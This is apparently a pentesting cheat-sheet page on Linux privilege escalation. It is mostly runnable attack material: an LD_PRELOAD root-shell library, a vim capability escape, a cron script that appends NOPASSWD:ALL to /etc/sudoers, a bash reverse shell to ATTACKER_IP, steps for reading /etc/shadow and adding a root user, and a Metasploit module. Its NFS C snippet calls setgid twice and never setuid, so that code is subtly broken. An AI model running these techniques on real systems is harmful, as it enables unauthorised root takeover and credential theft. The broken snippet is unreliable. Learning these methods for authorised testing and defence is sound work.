Skip to content

Linux Privilege Escalation

Kernel Exploitation

It typically target vulnerabilities in the Linux Kernel to execute arbitrary code to run privileged system commands or to obtain a system shell.

Kernel exploit methodology: 1. Identify the kernel version 2. Search and find an exploit code for the kernel version of the target system 3. Run the exploit

Research sources: 1. Use Google to search for an existing exploit code. 2. Sources such as https://www.cvedetails.com/ can also be useful. 3. Use a tool such as linux-exploit-suggester. 4. Use pspy - unprivileged Linux process snooping.

The tool provides data regarding details of the exploit, exposure and a download URL for the exploit.

These tools can generate false positives (report a kernel vulnerability that does not affect the target system) or false negatives (not report any kernel vulnerabilities although the kernel is vulnerable).

# Transfer the linux exploit suggester file to the target system
upload /PATH_TO_FILE/les.sh

# Compile and run C file with GCC
gcc FILE.c -o OUTPUT_FILE
./OUTPUT_FILE

Weak Permissions

The objective is to find a writable file that can be used to elevate our privileges.

find / -not -type l -perm -o+w

find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u

For instance, if the /etc/shadow file is writable, a new password for the root user can be generated and replaced in the /etc/shadow file:

openssl passwd -1 -salt abc PASSWORD_VALUE

Sudo Privileges

Under some conditions, system administrators may need to give regular users some flexibility on their privileges.

https://gtfobins.github.io/ is a valuable source that provides information on how any program, on which you may have sudo rights, can be used.

# List all commands your user can run using sudo
sudo -l

For example, if the man binary can be run with SUDO privileges without providing a password, an attacker could spawn an elevated shell:

sudo man ls
!/bin/bash

If a specific user needs to be used instead of root: sudo -u USER_NAME COMMAND

If when running sudo -l command we see (ALL : ALL):, it means that the current user can run anything. So, we can type sudo -i or sudo bash to become root instantly.

Application Functions

Apache2 has an option that supports loading alternative configuration files (-f : specify an alternate ServerConfigFile).

Loading the /etc/shadow file using this option will result in an error message that includes the first line of the /etc/shadow file.

LD_PRELOAD

LD_PRELOAD is a function that allows any program to use shared libraries.

The steps of this privilege escalation vector can be summarized as follows;

  1. Check for LD_PRELOAD (with the env_keep option)
  2. Write a simple C code compiled as a share object (.so extension) file
  3. Run the program with sudo rights and the LD_PRELOAD option pointing to our .so file

The C code will simply spawn a root shell and can be written as follows;

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}

# Save the above code as shell.c and compile it using gcc into a shared object
gcc -fPIC -shared -o shell.so shell.c -nostartfiles

# Run a program by specifying the LD_PRELOAD option. This will result in a shell spawn with root privileges
sudo LD_PRELOAD=shell.so find

SUID Binaries

SUID is a specialized permissions that stands for Set Owner User ID.

When applied, this permission allow files to be executed with the permission level of the file owner or the group owner, respectively.

Check for SUID binaries owned by the root user or other privileged user. Additionally, executable permissions for the current user are needed to execute the SUID binary. Check for s permission.

If a binary calls another one, this can be replaced with /bin/bash and once the initial binary is executed, a shell with privilege permissions will be run.

# List files that have SUID bit set
find / -type f -perm -4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

Nano

The SUID bit set for the nano text editor allows us to create, edit and read files using the file owner’s privilege. Nano is owned by root, which probably means that we can read and edit files at a higher privilege level than our current user has. At this stage, we have two basic options for privilege escalation: - Reading the /etc/shadow file: nano /etc/shadow will print the contents of the /etc/shadow file. We can now use the unshadow tool to create a file crackable by John the Ripper. To achieve this, unshadow needs both the /etc/shadow and /etc/passwd files. - Adding our user to /etc/passwd: we will need the hash value of the password we want the new user to have. This can be done quickly using the openssl tool, openssl passwd -1 -salt abc PASSWORD_VALUE. We will then add this password with a username to the /etc/passwd file.

PwnKit

Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation

Misconfigured Cron Jobs

Cron jobs are used to run scripts or binaries at specific times. By default, they run with the privilege of their owners and not the current user.

If there is a scheduled task that runs with root privileges and we can change the script that will be run, then our script will run with root privileges.

Leverage cron jobs by adding the current user to the sudoers file 

# List cron jobs
crontab -l
ls /etc/cron.d
cat /etc/crontab

# Search for occurrences of a specific path
grep -rnw /usr -e "/home/student/message"

# Once a shell with privilege permissions was identified, add the current user to the sudoers file
# Example: printf '#! /bin/bash\necho "student ALL=NOPASSWD:ALL" >> /etc/sudoers' > /usr/local/share/copy.sh
printf '#!/bin/bash\necho "<USER_NAME> ALL=NOPASSWD:ALL" >> /etc/sudoers' > FILE.sh

# List sudo
sudo -l

Leverage cron jobs by starting a reverse shell

Modify the script run by the cronjob to launch a reverse shell:

#!/bin/bash

bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1

Leverage deleted scripts that were not removed from crontab

Create a new script with the name defined in the cronjobs file that launches a reverse shell. If the full path of the script is not defined, cron will refer to the paths listed under the PATH variable in the /etc/crontab file.

Capabilities

Capabilities help manage privileges at a more granular level. If the system administrator does not want to give this user higher privileges, they can change the capabilities of the binary. As a result, the binary would get through its task without needing a higher privilege user.

The capability CAP_SET_UID is equivalent to suid permissions, allowing the program to call setuid.

# List enabled capabilities
getcap -r / 2>/dev/null

# Leverage bin
./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

PATH

If a folder for which your user has write permission is located in the path, you could potentially hijack an application to run a script. PATH in Linux is an environmental variable that tells the operating system where to search for executables.

This depends entirely on the existing configuration of the target system, so be sure you can answer the questions below before trying this:

  1. What folders are located under $PATH?
  2. Does your current user have write privileges for any of these folders?
  3. Can you modify $PATH?
  4. Is there a script/application you can start that will be affected by this vulnerability?
# Search for writable folders
find / -writable 2>/dev/null

# Get rid of the results related to running processes
find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u

Example of a script that tries to launch a system binary called thm The folder that will be easier to write to is probably /tmp. So, since /tmp is not present in PATH, we will need to add it. 

export PATH=/tmp:$PATH
echo "/bin/bash -p" > thm
chmod 777 thm

NFS

Another vector is a misconfigured network shell. This vector can sometimes be seen during penetration testing engagements when a network backup system is present.

NFS (Network File Sharing) configuration is kept in the /etc/exports file. This file is created during the NFS server installation and can usually be read by users.

If the “no_root_squash” option is present on a writable share, we can create an executable with SUID bit set and run it on the target system.

# Enumerate mountable shares
showmount -e TARGET_IP

# Mount one of the “no_root_squash” shares to our attacking machine 
mkdir /tmp/backupattackermachine

mount -o rw TARGET_IP:/backups /tmp/backupattackermachine

# Create a file that run /bin/bash on the target system
int main()
{ setgid(0);
  setgid(0);
  system("/bin/bash");
  return 0;
}

# Compile the code
gcc nfs.c -o nfs -w
# Sometimes -pthread flag is needed

# Set the SUID bit
chmod +s nfs

# The nfs executable has the SUID bit set on the target system and runs with root privileges.

Exploiting a Vulnerable Program: Chkrootkit

It will depend on the kernel version and the distribution release version.

Once a Meterpreter session is established:

# List processes
ps aux

chkrootkit

use exploit/unix/local/chkrootkit
set SESSION SESSION_ID
set CHKROOTKIT /bin/chkrootkit
set LHOST ATTACKER_IP
run